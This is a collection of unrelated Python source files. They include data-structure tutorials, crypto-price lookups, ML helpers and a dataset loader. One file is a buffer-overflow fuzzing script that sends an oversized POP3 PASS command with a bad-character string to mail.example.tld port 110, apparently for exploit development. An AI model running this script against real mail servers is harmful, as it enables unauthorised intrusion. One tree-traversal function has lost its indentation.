        adf_results['Test Statistic'], adf_results['p-value'])
    kpss_msg = 'KPSS test statistic: {:.2f} (p-val: {:.2f})'.format(
        kpss_results['Test Statistic'], kpss_results['p-value'])
    print(adf_msg)
    print(kpss_msg)
    fig, axes = plt.subplots(2, figsize=(16, 8))
    plot_acf(x, ax=axes[0], lags=n_lags, alpha=alpha)
    plot_pacf(x, ax=axes[1], lags=n_lags, alpha=alpha)
    return fig
| StarcoderdataPython |
1793526 | from setuptools import setup, find_packages
# Read the long description up front so the file handle is closed promptly;
# the original inline open('README.md').read() leaked the handle (relied on GC).
with open('README.md') as _readme:
    _long_description = _readme.read()

setup(
    name='pyexpert',
    packages=find_packages(exclude=['tests']),
    version='0.0.1',
    description='A small prolog implementation for embedded expert systems',
    long_description=_long_description,
    keywords=['prolog'],
    install_requires=['arpeggio'],
    license='MIT'
)
| StarcoderdataPython |
9605031 | '''
BINARY SEARCH TREE
* The left subtree of a node contains only nodes with keys lesser than the node’s key.
* The right subtree of a node contains only nodes with keys greater than the node’s key.
* The left and right subtree each must also be a binary search tree.
* There must be no duplicate nodes.
'''
class Node:
    """A single BST node: a key (`val`) plus `left`/`right` child links."""

    def __init__(self, key):
        self.val = key
        self.left = None
        self.right = None
'''
SEARCH
[RUNTIME] O(logn)
'''
def search(root, key):
    '''
    Recursively locate `key` in the BST rooted at `root`.
    Returns the matching node, or None if the key is absent.
    [RUNTIME] O(log n) for a balanced tree
    '''
    if root is None or root.val == key:
        return root
    subtree = root.left if key < root.val else root.right
    return search(subtree, key)
def searchIterative(root, key):
    '''
    Iteratively locate `key` in the BST rooted at `root`.
    Returns the matching node, or None if the key is absent.

    Fix: dropped the unused `parent` bookkeeping and the redundant up-front
    None check (the loop condition already covers an empty tree).
    '''
    curr = root
    while curr is not None:
        if curr.val == key:
            return curr
        curr = curr.left if key < curr.val else curr.right
    return curr
'''
INSERT
* start at root
* recurse on left if val of node < root or right if >
* when reach leaf node, insert at either left/right side
[RUNTIME] O(logn)
'''
# [INSERTION] traverse from root to leaf (new node always inserted as leaf node)
def insert(root, key):
    '''
    Recursively insert `key` as a new leaf and return the subtree root.
    Keys less than or equal to a node go left, larger keys go right
    (matching the original's tie-breaking).
    [RUNTIME] O(log n) for a balanced tree
    '''
    if root is None:
        return Node(key)
    if key > root.val:
        root.right = insert(root.right, key)
    else:
        root.left = insert(root.left, key)
    return root
def insertIterative(root, key):
    '''
    Iteratively insert `key` as a new leaf and return the tree root.

    Fix: removed a leftover debug `print(key)` that polluted stdout on
    every insertion.
    '''
    # Empty tree: the new node becomes the root.
    if root is None:
        return Node(key)
    curr = root
    parent = None  # trailing pointer: ends on the leaf to attach to
    while curr:
        parent = curr
        if curr.val < key:
            curr = curr.right
        else:
            curr = curr.left
    node = Node(key)
    if parent.val < key:
        parent.right = node
    else:
        parent.left = node
    return root
'''
DELETE
3 possibilities arise when deleting a node
1. Node to be deleted is the leaf
simply remove the node
2. Node to be deleted only has one child
Remove node and replace it with its child
3. Node to be deleted has two children
Find inorder successor/predecessor of the node and
copy content and delete the inorder successor/pred
[RUNTIME] O(logn) --> skewed BST O(n)
'''
def deleteNode(root, key):
    """Recursively delete `key` from the BST rooted at `root`.

    Returns the (possibly new) root of the subtree, so callers should
    rebind: ``root = deleteNode(root, key)``.  A node with two children is
    replaced by its inorder successor (smallest key of the right subtree);
    the successor's parent is tracked iteratively, avoiding a second
    recursive delete.
    """
    # first we need to find the actual node to be deleted
    # base case
    if root is None:
        return root
    if key < root.val:
        # key lies in left subtree
        root.left = deleteNode(root.left, key)
        return root
    elif key > root.val:
        # key lies in right subtree
        root.right = deleteNode(root.right, key)
        return root
    else:
        # key is same as root, found node to be deleted
        # ****** If node has 1 child or no children
        if root.right is None:
            temp = root.left
            root = None # rebinds the local name only; does not actually free the node
            return temp
        if root.left is None:
            temp = root.right
            root = None # rebinds the local name only; does not actually free the node
            return temp
        # ****** o/w node has 2 children
        # inorder successor - smallest in right subtree
        # NOTE: track the parent of successor to AVOID recursive call to delete successor
        # NOTE: Successor/Predecessor won't always be a LEAF NODE
        # find the successor
        parent = root
        succ = root.right
        while succ.left is not None:
            parent = succ
            succ = succ.left
        if parent != root:
            # succ will be leftmost, assign succ.right to parent.left
            parent.left = succ.right
        else:
            # immediate right of root is succ
            parent.right = succ.right
        # COPY succ data to root
        root.val = succ.val
        return root
def findSucc(root):
    '''
    Return (parent, successor) for a node `root` assumed to have two
    children: the successor is the smallest node in root's right subtree.

    Fix: `parent` is now initialised to `root`; previously it was left
    unbound (NameError on return) whenever root.right had no left child,
    i.e. whenever the successor was root's immediate right child.
    '''
    parent = root
    curr = root.right
    while curr.left is not None:
        parent = curr
        curr = curr.left
    return parent, curr
def deleteNodeIterative(root, key):
    '''
    Iteratively delete `key` from the BST and return the (possibly new)
    root, so callers should rebind: ``root = deleteNodeIterative(root, key)``.

    Fixes over the original:
    * The 0/1-child case set ``curr = None`` *before* testing
      ``parent.right is curr``, so the identity test always compared
      against None and relinked the wrong child (or none at all).
    * Deleting the root when it has at most one child now works (the new
      root is returned instead of the stale one).
    * The successor search is inlined and its parent is correctly
      initialised, covering the successor-is-immediate-right case.
    '''
    # Locate the node and remember its parent.
    parent = None
    curr = root
    while curr is not None and curr.val != key:
        parent = curr
        curr = curr.left if key < curr.val else curr.right
    if curr is None:
        return root  # key not present
    if curr.left is not None and curr.right is not None:
        # Two children: copy in the inorder successor's value, then unlink
        # the successor (which has no left child by construction).
        succ_parent = curr
        succ = curr.right
        while succ.left is not None:
            succ_parent = succ
            succ = succ.left
        curr.val = succ.val
        if succ_parent.left is succ:
            succ_parent.left = succ.right
        else:
            succ_parent.right = succ.right
        return root
    # Zero or one child: splice the child (possibly None) into curr's place.
    child = curr.left if curr.left is not None else curr.right
    if parent is None:
        return child  # deleted the root itself
    if parent.left is curr:
        parent.left = child
    else:
        parent.right = child
    return root
'''
INORDER Traversal
'''
def inorder(root):
if root is None:
return
inorder(root.left)
print(root.val, ',', end="")
inorder(root.right)
# DRIVER CODE: build the tree, then exercise search / delete / inorder.
keys = [15, 10, 20, 8, 12, 16, 25]
root = None
for key in keys:
    root = insertIterative(root, key)
print('search BST:', search(root, 25).val)
print('searchIterative 25 BST:', searchIterative(root, 25).val)
print('delete node(25) from BST...', )
# FIX: capture the returned root — required whenever the root itself is deleted.
root = deleteNode(root, 25)
print('searchIterative 25 BST:', searchIterative(root, 25))
print('deleteNodeIterative node(15) from BST...', )
root = deleteNodeIterative(root, 15)
# FIX: was searchIterative(root, 25); the label (and the intent, right after
# deleting 15) is clearly a lookup of key 15.
print('searchIterative 15 BST:', searchIterative(root, 15))
print('inorder traversal:')
inorder(root)
'''
ADVANTAGES of BST over HASH TABLES
* We can get all keys in sorted order by just doing Inorder Traversal of BST. This is not a natural operation in Hash Tables and requires extra efforts.
* Doing order statistics, finding closest lower and greater elements, doing range queries are easy to do with BSTs. Like sorting, these operations
are not a natural operation with Hash Tables.
* BSTs are easy to implement compared to hashing, we can easily implement our own customized BST. To implement Hashing, we generally rely on libraries provided by programming languages.
* With Self-Balancing BSTs, all operations are guaranteed to work in O(Logn) time. But with Hashing, Θ(1) is average time and some particular operations may be costly,
especially when table resizing happens.
''' | StarcoderdataPython |
132994 | <gh_stars>1-10
import torch
from random import randint, gauss
def get_device():
    """Pick a torch device: a uniformly random CUDA GPU when available, else the CPU."""
    if torch.cuda.is_available():
        index = randint(0, torch.cuda.device_count() - 1)
        return torch.device("cuda:{}".format(index))
    return torch.device("cpu")
class OrnsteinUhlenbeckProcess(object):
    """Discrete Ornstein-Uhlenbeck noise process, one value per tracked dimension.

    Each step applies mean-reverting drift (-theta * x * dt) plus Gaussian
    noise with standard deviation `sigma`.
    """

    def __init__(self, dt=1, theta=.15, sigma=1, nums=1):
        self.dt = dt
        self.theta = theta
        self.sigma = sigma
        self.nums = nums
        self.x = [0] * nums

    def __call__(self):
        """Advance the process one step; returns the new state list (== self.x)."""
        advanced = []
        for value in self.x:
            drift = -self.theta * value * self.dt
            advanced.append(value + drift + gauss(0, self.sigma))
        self.x = advanced
        return self.x

    def reset(self):
        """Restart the process from the origin."""
        self.x = [0] * self.nums
def copy(source, destination):
    """Overwrite `destination`'s parameters/buffers with `source`'s (in place).

    NOTE: shadows the stdlib `copy` module name within this file.
    """
    snapshot = source.state_dict()
    destination.load_state_dict(snapshot)
def tau_move_average(source, destination, tau=0.1):
    """Polyak/soft update: destination <- tau * source + (1 - tau) * destination."""
    target_state = destination.state_dict()
    source_state = source.state_dict()
    for name in target_state:
        target_state[name] = source_state[name] * tau + target_state[name] * (1 - tau)
    destination.load_state_dict(target_state)
| StarcoderdataPython |
3528962 | <filename>polecat/model/defaults.py
from polecat.utils.proxy import Proxy
# Module-level default Blueprint wrapped in a Proxy, resolved from the dotted
# path 'polecat.model.blueprint.Blueprint' — presumably lazily, to break an
# import cycle; confirm against polecat.utils.proxy.Proxy's semantics.
default_blueprint = Proxy('polecat.model.blueprint.Blueprint')
| StarcoderdataPython |
4862274 | <gh_stars>1-10
import requests
from decimal import Decimal
from datetime import datetime
from collections import defaultdict
import os
ETHERSCAN_KEY = os.environ["ETHERSCAN_KEY"]
def erc20_address_call(address):
    """Fetch all ERC-20 token transfers for an Ethereum wallet from Etherscan
    and aggregate them per token symbol.

    Returns a dict with:
      - 'eth_coins': per-token remaining balance, only for tokens whose net
        balance is >= 0
      - 'tx_in' / 'tx_out': per-token totals received / sent (outgoing totals
        are stored negative, matching the original accounting)

    Fixes: removed dead per-transaction variables (hash, sender, token name,
    confirmations, timestamp/date were computed but never used) and leftover
    debug print statements.
    """
    address = str(address)
    url = ("http://api.etherscan.io/api?module=account&action=tokentx&address=" + address +
           "&startblock=0&endblock=999999999&sort=asc&apikey=" + ETHERSCAN_KEY)
    eth_token_totals = defaultdict(lambda: 0)
    positive_count_eth = defaultdict(lambda: 0)
    transactions_in = defaultdict(lambda: 0)
    transactions_out = defaultdict(lambda: 0)
    client_response = defaultdict(lambda: 0)
    response = requests.get(url)
    result = response.json().get("result")
    for transaction in result:
        tx_to = transaction.get("to")
        value = int(transaction.get("value"))
        decimals = int(transaction.get("tokenDecimal"))
        token_symbol = transaction.get("tokenSymbol")
        # NOTE(review): float math loses precision on large token amounts;
        # Decimal (already imported at module level) would be safer — confirm
        # before changing the stored value type.
        real_value = value * 10 ** (decimals * -1)
        if tx_to == address.lower():
            # Incoming transfer.
            eth_token_totals[token_symbol] += real_value
            transactions_in[token_symbol] += real_value
        else:
            # Outgoing transfer (recorded as a negative amount).
            eth_token_totals[token_symbol] += (real_value * -1)
            transactions_out[token_symbol] += (real_value * -1)
    for symbol, total in eth_token_totals.items():
        if total >= 0:
            positive_count_eth[symbol] += total
    client_response['eth_coins'] = positive_count_eth
    client_response['tx_in'] = transactions_in
    client_response['tx_out'] = transactions_out
    return client_response
def btc_address_call(address):
    """Query blockchain.info for a bitcoin wallet and return a dict with its
    'BTC' balance plus lifetime 'tx_in' / 'tx_out' totals, all converted from
    satoshi to BTC."""
    url = "https://blockchain.info/rawaddr/" + str(address)
    summary = requests.get(url).json()
    satoshi = 10 ** (-8)  # one satoshi expressed in BTC
    totals = defaultdict(lambda: 0)
    totals['BTC'] += float(int(summary.get("final_balance")) * satoshi)
    totals['tx_in'] = int(summary.get("total_received")) * satoshi
    totals['tx_out'] = int(summary.get("total_sent")) * satoshi
    return totals
def erc20_value_search(coins):
    """Fetch current Binance ticker prices and return the <COIN>ETH pair
    price (as reported, a string) for every requested coin symbol that has
    a listed pair.

    Fix: the original rescanned the full rate list once per coin
    (O(len(coins) * len(rates))); a single pass over the rates with a
    precomputed wanted-set is O(n + m) and produces the same mapping.
    """
    url2 = "http://api.binance.com/api/v3/ticker/price"
    rate_list = requests.get(url2).json()
    wanted_pairs = {coin + 'ETH' for coin in coins}
    pair_conversions = defaultdict(lambda: 0)
    for rate in rate_list:
        symbol = rate['symbol']
        if symbol in wanted_pairs:
            pair_conversions[symbol] = rate['price']
    return pair_conversions
def btc_eth_toUSD():
    """Return the current BTC and ETH prices in USD from cryptocompare.com."""
    endpoint = "https://min-api.cryptocompare.com/data/pricemulti?fsyms=BTC,ETH&tsyms=USD"
    return requests.get(endpoint).json()
| StarcoderdataPython |
1955846 | <filename>5_18.py
"""Description: reads an amount due and prints how many banknotes of each
denomination (100, 50, 20, 10, 5, 1) are needed to pay it.
Author: <NAME>
Date:
Version: 001
"""
# Read the amount to pay.
valor = int(input("Digite o valor a pagar:"))

cédulas = 0     # notes counted for the current denomination
atual = 100     # denomination currently being dispensed
apagar = valor  # remaining amount still to pay

while True:
    if atual <= apagar:
        # Dispense one more note of the current denomination.
        apagar -= atual
        cédulas += 1
    else:
        # Current denomination exhausted: report it and step down.
        print("%d cédula(s) de R$%d" % (cédulas, atual))
        if apagar == 0:
            break
        # FIX: this chain must be if/elif throughout.  The original used two
        # separate `if`s for 100 and 50, so a 100 immediately fell through to
        # 20 and R$50 notes were never dispensed.
        if atual == 100:
            atual = 50
        elif atual == 50:
            atual = 20
        elif atual == 20:
            atual = 10
        elif atual == 10:
            atual = 5
        elif atual == 5:
            atual = 1
        cédulas = 0
| StarcoderdataPython |
6645358 | <reponame>zaygeee/MASTER
# coding=utf-8
import hmac
import hashlib
import base64
from Crypto.PublicKey import RSA
from Crypto.Signature import PKCS1_v1_5
from Crypto.Hash import SHA
from Crypto.Hash import MD5
priKey = '''-----<KEY>'''
class transfer:
    """Helpers for formatting transfer amounts and signing payloads."""

    def money_format(self, value):
        """Format `value` with two decimals and comma thousands separators."""
        text = "%.2f" % float(value)
        whole, dot, frac = text.partition('.')
        suffix = dot + frac
        groups = []
        while whole:
            groups.insert(0, whole[-3:])
            whole = whole[:-3]
        return ','.join(groups) + suffix

    def rounding_up(self, value):
        """Round up to the next integer whenever `value % 1` is positive.

        Uses truncation plus Python's (always non-negative) modulo, so e.g.
        -1.5 -> 0, matching the original behaviour.
        """
        whole = int(value / 1)
        if value % 1 > 0:
            whole += 1
        return whole

    def sign(self, signdate):
        """Return the url-safe base64 PKCS#1 v1.5 signature of MD5(signdate)."""
        digest = MD5.new(signdate)
        signer = PKCS1_v1_5.new(RSA.importKey(priKey))
        return base64.urlsafe_b64encode(signer.sign(digest))
# Thin subclass that adds nothing to `transfer` — presumably kept for ad-hoc
# testing or backwards compatibility; confirm whether any caller needs it.
class test(transfer):
    pass
387019 | #!/usr/bin/env python
"""fuzza autogenerated."""
from __future__ import print_function
import socket
def str2b(data):
    """Unescape backslash escape sequences in `data`, portably across Python 2/3.

    On Python 2, `str.decode('string_escape')` performs the unescaping; on
    Python 3 that attribute/codec is absent (AttributeError), so the
    utf-8 -> unicode-escape -> latin-1 round-trip is used instead, yielding
    `bytes`.  If both attempts fail, control falls off the end and the
    function implicitly returns None.
    """
    # Python2: Unescape control chars
    try:
        return data.decode('string_escape')
    except AttributeError:
        pass
    except UnicodeDecodeError:
        pass
    # Python3: Unescape control chars and convert to byte
    try:
        return data.encode("utf-8").decode('unicode-escape').encode("latin1")
    except UnicodeDecodeError:
        pass
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
len_overflow = 2700 # Use pattern_create.rb and pattern_offset.rb to find exact offset
eip = "B"*4 # Ignore for badchar detection
badchars = (
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)
buffer = "A"*len_overflow + eip + badchars
print('Trying to send %s bytes buffer...' % (str(len(buffer))))
try:
s.connect(('mail.example.tld', 110))
s.recv(1024)
s.send(str2b('USER test\r\n'))
s.recv(1024)
s.send(str2b('PASS ' + buffer + '\r\n'))
s.recv(1024)
s.send(str2b('QUIT\r\n'))
print('done')
except:
print('Could not connect')
s.close()
| StarcoderdataPython |
11200104 | <reponame>glpzzz/prognos
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
"""
conditions.py
Copyright 2014 <NAME> <<EMAIL>>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
class Locations(object):
    """Lookup table of forecast location names to the labels used by the feed."""

    def __init__(self):
        """Build the location-name mapping."""
        entries = (
            (u'PINAR DEL RIO', u'Pronóstico Extendido del Tiempo por Ciudades'),
            (u'LA HABANA', u'LA HABANA'),
            (u'VARADERO', u'VARADERO'),
            (u'CIENFUEGOS', u'CIENFUEGOS'),
            (u'CAYO COCO', u'CAYO COCO'),
            (u'CAMAGÜEY', u'CAMAGÜEY'),
            (u'HOLGUIN', u'HOLGUIN'),
            (u'SANTIAGO DE CUBA', u'SANTIAGO DE CUBA'),
        )
        # NOTE(review): the PINAR DEL RIO value looks like a feed header rather
        # than a location label (the file mentions malformed XML values) —
        # confirm against the upstream source.
        self.locations = dict(entries)
class WeatherStatus(object):
    """Lookup table of forecast phrases to weather-icon resource paths."""

    def __init__(self):
        """Build the phrase -> icon-path mapping."""
        icons = (
            ('Lluvias Ocasionales', ':/actions/images/weather-showers-scattered-day.png'),
            ('Lluvias dispersas', ':/actions/images/weather-showers-scattered-day.png'),
            ('Lluvias aisladas', ':/actions/images/weather-showers-scattered-day.png'),
            ('Lluvias en la Tarde', ':/actions/images/weather-showers-scattered-night.png'),
            ('Chubascos', ':/actions/images/weather-showers-day.png'),
            ('Parcialmente Nublado', ':/actions/images/weather-few-clouds.png'),
            ('Nublado', ':/actions/images/weather-many-clouds.png'),
            ('Soleado', ':/actions/images/weather-clear.png'),
            ('Tormentas', ':/actions/images/weather-storm-day.png'),
        )
        self.weather_status = dict(icons)
| StarcoderdataPython |
6698738 | '''
write a sequence of argv[1] normally distributed random numbers with mean argv[2] and std.dev argv[3] into argv[4] (ASCII text file)
Example:
python create_init_distr.py 20 -16.44 0.3 fens.txt
'''
from math import *
import random
import sys #for getting command line args
noe = int(sys.argv[1]) #number of ensemble members
mu = float(sys.argv[2]) #mean of the normal distribution
sig = float(sys.argv[3]) #standard deviation of the normal distribution
f = open(sys.argv[4], 'w') #open the desired text file to write output in there
for i in range(noe):
#r = random.gauss(log10(4e-17), log10(8e-17/4e-17)) #-16.4+-0.3 seems reasonable, 4e-17 is mu, 8e-17 is mu+1sigma
r = random.gauss(mu, sig)
f.write(str(r)+'\n')
f.close()
# DART $Id$
# from <NAME>
#
# <next few lines under version control, do not edit>
# $URL$
# $Revision$
# $Date$
| StarcoderdataPython |
11250271 | <gh_stars>100-1000
__all__ = [
"CNNRegressor",
"FCNRegressor",
"InceptionTimeRegressor",
"LSTMRegressor",
"LSTMFCNRegressor",
"EncoderRegressor",
"CNTCRegressor",
"MCDCNNRegressor",
"MLPRegressor",
"ResNetRegressor",
"SimpleRNNRegressor",
"TLENETRegressor",
]
from sktime_dl.regression._cnn import CNNRegressor
from sktime_dl.regression._fcn import FCNRegressor
from sktime_dl.regression._inceptiontime import InceptionTimeRegressor
from sktime_dl.regression._lstm import LSTMRegressor
from sktime_dl.regression._lstmfcn import LSTMFCNRegressor
from sktime_dl.regression._encoder import EncoderRegressor
from sktime_dl.regression._cntc import CNTCRegressor
from sktime_dl.regression._mcdcnn import MCDCNNRegressor
from sktime_dl.regression._mlp import MLPRegressor
from sktime_dl.regression._resnet import ResNetRegressor
from sktime_dl.regression._rnn import SimpleRNNRegressor
from sktime_dl.regression._tlenet import TLENETRegressor
| StarcoderdataPython |
261926 | <filename>conkit/io/tests/test_evfold.py
"""Testing facility for conkit.io.EVfold"""
__author__ = "<NAME>"
__date__ = "26 Oct 2016"
import os
import unittest
from conkit.core.contact import Contact
from conkit.core.contactfile import ContactFile
from conkit.core.contactmap import ContactMap
from conkit.core.sequence import Sequence
from conkit.io.evfold import EVfoldParser
from conkit.io.tests.helpers import ParserTestCase
class TestEVfoldParser(ParserTestCase):
    """Round-trip tests for conkit's EVfold contact-file parser."""
    def test_read_1(self):
        """Parsing a 10-row EVfold file yields one map with all scores intact."""
        # Row layout (per the assertions below): res1_seq, residue-1 code,
        # res2_seq, residue-2 code, a bound column, raw score.
        content = """1 M 2 V 0 0.0338619
1 M 3 G 0 0.0307956
1 M 4 L 0 0.0268079
1 M 5 T 0 0.0219783
1 M 6 T 0 0.0222061
1 M 7 L 0 0.0213079
1 M 8 F 0 0.0119054
1 M 9 W 0 0.0275182
1 M 10 L 0 0.0134577
1 M 11 G 0 0.0234555
"""
        f_name = self.tempfile(content=content)
        with open(f_name, "r") as f_in:
            contact_file = EVfoldParser().read(f_in)
        contact_map1 = contact_file.top_map
        # One map, all ten contacts, with indices and scores preserved.
        self.assertEqual(1, len(contact_file))
        self.assertEqual(10, len(contact_map1))
        self.assertEqual([1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [c.res1_seq for c in contact_map1])
        self.assertEqual([2, 3, 4, 5, 6, 7, 8, 9, 10, 11], [c.res2_seq for c in contact_map1])
        self.assertEqual(
            [
                0.0338619,
                0.0307956,
                0.0268079,
                0.0219783,
                0.0222061,
                0.0213079,
                0.0119054,
                0.0275182,
                0.0134577,
                0.0234555,
            ],
            [c.raw_score for c in contact_map1],
        )
    def test_write_1(self):
        """Writing a hand-built contact file emits EVfold rows with residue codes
        taken from the attached sequence register."""
        contact_file = ContactFile("RR")
        contact_file.target = "R9999"
        # NOTE(review): "<PASSWORD>" looks like a dataset-anonymisation
        # artifact, not a real author string — confirm against upstream conkit.
        contact_file.author = "<PASSWORD>"
        contact_file.remark = ["Predictor remarks"]
        contact_file.method = ["Description of methods used", "Description of methods used"]
        contact_map = ContactMap("1")
        contact_file.add(contact_map)
        # (res1_seq, res2_seq, lower_bound, upper_bound, raw_score)
        for c in [(1, 9, 0, 8, 0.7), (1, 10, 0, 8, 0.7), (2, 8, 0, 8, 0.9), (3, 12, 0, 8, 0.4)]:
            contact = Contact(c[0], c[1], c[4], distance_bound=(c[2], c[3]))
            contact_map.add(contact)
        contact_map.sequence = Sequence("1", "HLEGSIGILLKKHEIVFDGCHDFGRTYIWQMSD")
        contact_map.set_sequence_register()
        f_name = self.tempfile()
        with open(f_name, "w") as f_out:
            EVfoldParser().write(f_out, contact_file)
        content = ["1 H 9 L 0 0.7", "1 H 10 L 0 0.7", "2 L 8 I 0 0.9", "3 E 12 K 0 0.4"]
        with open(f_name, "r") as f_in:
            output = f_in.read().splitlines()
        self.assertEqual(content, output)
if __name__ == "__main__":
    unittest.main(verbosity=2)
| StarcoderdataPython |
9724701 | <filename>server/routes/dashboard.py
from pydantic import BaseModel
from fastapi import APIRouter
from fastapi.responses import JSONResponse
import jwt
from config import db, SECRET_KEY
# Router mounted under /api; all routes defined below share this prefix.
router = APIRouter(prefix='/api')
# Collections from the shared `db` handle (presumably MongoDB via pymongo —
# confirm in config.py).
account_collection = db.get_collection('accounts')
coin_collection = db.get_collection('coins')
class Dashboard(BaseModel):
    """Request body for POST /api/dashboard."""
    # JWT issued at login; decoded with SECRET_KEY to identify the account.
    token: str
@router.post('/dashboard')
async def dashboard(dashboard: Dashboard):
    """Return the authenticated user's account summary plus the coin catalogue.

    The JWT in the request body identifies the account.  Responses:
    200 with account + coins, 401 for bad/expired tokens, 404 when the token
    is valid but the account no longer exists, 500 for anything else.
    """
    try:
        payload = jwt.decode(dashboard.token, SECRET_KEY, algorithms=['HS256'])
        account = account_collection.find_one({'_id': payload['_id']})
        if account is None:
            # FIX: previously a missing account raised a TypeError on the
            # subscriptions below and surfaced as a generic 500; report it
            # explicitly instead.
            return JSONResponse(
                {'message': 'account not found', 'success': False}, status_code=404
            )
        formatted_coins = [
            {
                '_id': coin['_id'],
                'name': coin['name'],
                'abbreviation': coin['abbreviation'],
                'price': coin['price'],
            }
            for coin in coin_collection.find({})
        ]
        return JSONResponse(
            {
                'message': 'successfully found dashboard data', 'success': True,
                'account': {
                    'balances': account['balances'],
                    'friends': account['friends'],
                    'boughtCoins': account['coins']
                },
                'coins': formatted_coins
            },
            status_code=200
        )
    except jwt.exceptions.DecodeError:
        return JSONResponse({'message': 'invalid token', 'success': False}, status_code=401)
    except jwt.exceptions.ExpiredSignatureError:
        return JSONResponse({'message': 'token expired', 'success': False}, status_code=401)
    except Exception as e:
        # Last-resort boundary handler so the client always gets JSON.
        return JSONResponse(
            {'message': 'unknown error', 'error': str(e), 'success': False}, status_code=500
        )
305407 | <gh_stars>10-100
from sacrerouge.datasets.chaganty2018.subcommand import Chaganty2018Subcommand
| StarcoderdataPython |
205164 | import numpy as np
import os.path as osp
import random
import mmcv
import cv2
from .custom import CustomDataset
from .extra_aug import ExtraAugmentation
from .registry import DATASETS
from .transforms import (ImageTransform, BboxTransform, MaskTransform,
SegMapTransform, Numpy2Tensor)
from pycocotools.ytvos import YTVOS
from mmcv.parallel import DataContainer as DC
from .utils import to_tensor, random_scale
from .cutblur import CutBlur
from .cutnoise import CutNoise
from .instaboost import InstaBoost
@DATASETS.register_module
class YTVOSDataset(CustomDataset):
    """YouTube-VIS (YTVOS) video instance segmentation dataset.

    Each training sample is a *pair* of frames from the same video: the
    frame to predict and a randomly sampled reference frame used for
    tracking (`gt_pids` encodes the instance matching between the two).
    Test samples are single frames, optionally multi-scale and flipped.
    """

    CLASSES = ('person', 'giant_panda', 'lizard', 'parrot', 'skateboard', 'sedan',
               'ape', 'dog', 'snake', 'monkey', 'hand', 'rabbit', 'duck', 'cat', 'cow', 'fish',
               'train', 'horse', 'turtle', 'bear', 'motorbike', 'giraffe', 'leopard',
               'fox', 'deer', 'owl', 'surfboard', 'airplane', 'truck', 'zebra', 'tiger',
               'elephant', 'snowboard', 'boat', 'shark', 'mouse', 'frog', 'eagle', 'earless_seal',
               'tennis_racket')

    def __init__(self,
                 ann_file,
                 img_prefix,
                 img_scale,
                 img_norm_cfg,
                 size_divisor=None,
                 proposal_file=None,
                 num_max_proposals=1000,
                 flip_ratio=0,
                 with_mask=True,
                 with_crowd=True,
                 with_label=True,
                 with_track=False,
                 with_prop=False,
                 with_semantic_seg=False,
                 seg_scale_factor=1,
                 extra_aug=None,
                 cutblur=None,
                 cutnoise=None,
                 instaboost=None,
                 aug_ref_bbox_param=None,
                 resize_keep_ratio=True,
                 test_mode=False):
        """Build the dataset index and configure all transforms.

        Args:
            ann_file (str): Path to the YTVOS-format annotation file.
            img_prefix (str): Directory prepended to per-frame file names.
            img_scale (tuple | list[tuple]): (long_edge, short_edge) scale(s).
            img_norm_cfg (dict): Image normalization configuration.
            size_divisor (int, optional): Pad images so sides divide evenly
                (needed for FPN).
            proposal_file (str, optional): Precomputed proposals.
            num_max_proposals (int): Cap on proposals per image.
            flip_ratio (float): Probability of horizontal flip in [0, 1].
            with_mask/with_crowd/with_label/with_track/with_prop/
            with_semantic_seg (bool): Which annotation fields to return.
            seg_scale_factor (float): Rescale factor for semantic seg maps.
            extra_aug (dict, optional): ExtraAugmentation config.
            cutblur/cutnoise/instaboost (dict, optional): Optional
                augmentation configs; None disables each.
            aug_ref_bbox_param (tuple, optional): (center_off, size_perturb)
                jitter for reference-frame boxes.
            resize_keep_ratio (bool): Keep aspect ratio when rescaling.
            test_mode (bool): If True, no annotations are required.
        """
        # prefix of images path
        self.img_prefix = img_prefix
        # load annotations (and proposals)
        self.vid_infos = self.load_annotations(ann_file)
        # flatten videos into (video_index, frame_id) sample keys
        img_ids = []
        for idx, vid_info in enumerate(self.vid_infos):
            for frame_id in range(len(vid_info['filenames'])):
                img_ids.append((idx, frame_id))
        self.img_ids = img_ids
        if proposal_file is not None:
            self.proposals = self.load_proposals(proposal_file)
        else:
            self.proposals = None
        # filter images with no annotation during training
        if not test_mode:
            valid_inds = [i for i, (v, f) in enumerate(self.img_ids)
                          if len(self.get_ann_info(v, f)['bboxes'])]
            self.img_ids = [self.img_ids[i] for i in valid_inds]
